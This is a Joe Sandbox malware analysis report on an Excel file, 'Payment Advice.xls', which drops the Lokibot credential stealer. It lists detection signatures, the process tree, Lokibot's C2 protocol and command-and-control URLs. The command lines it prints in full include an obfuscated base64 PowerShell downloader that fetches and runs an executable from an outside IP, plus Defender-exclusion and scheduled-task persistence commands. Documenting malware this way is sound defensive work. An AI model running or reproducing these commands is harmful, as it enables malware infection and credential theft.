Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Advice.xls

Overview

General Information

Sample name:Payment Advice.xls
Analysis ID:1559095
MD5:5a69ac58c3133e24a783cf4ea670a243
SHA1:7fdf7feed6f105ce6bfeb34fb44c9c58dfe9057e
SHA256:f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d
Tags:xlsuser-abuse_ch
Infos:

Detection

HTMLPhisher, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Lokibot
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3192 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3492 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3580 cmdline: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3792 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3800 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • caspol.exe (PID: 3888 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)
          • powershell.exe (PID: 3948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • schtasks.exe (PID: 4056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
          • caspol.exe (PID: 2596 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)
    • AcroRd32.exe (PID: 2780 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
    • mshta.exe (PID: 3424 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3860 cmdline: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 1688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 4092 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3016 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • caspol.exe (PID: 4076 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)
          • powershell.exe (PID: 2456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 2524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • schtasks.exe (PID: 4028 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
          • caspol.exe (PID: 3600 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)
  • taskeng.exe (PID: 1976 cmdline: taskeng.exe {819EB824-4817-4048-BBF5-A7A0A0C35676} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • rrwscqkDSNwLK.exe (PID: 1644 cmdline: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe MD5: 74061922F1E78C237A66D12A15A18181)
      • powershell.exe (PID: 956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 1944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3232 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • rrwscqkDSNwLK.exe (PID: 3576 cmdline: "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: 74061922F1E78C237A66D12A15A18181)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
      SourceRuleDescriptionAuthorStrings
      00000012.00000002.637368812.0000000000874000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              Click to see the 47 entries
              SourceRuleDescriptionAuthorStrings
              28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                  28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                    • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                    28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                    • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                    Click to see the 37 entries

                    System Summary

                    barindex
                    Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3888, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", ProcessId: 3948, ProcessName: powershell.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))", CommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwY
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3192, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3492, ProcessName: mshta.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment, CommandLine|base64offset|contains: E, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgI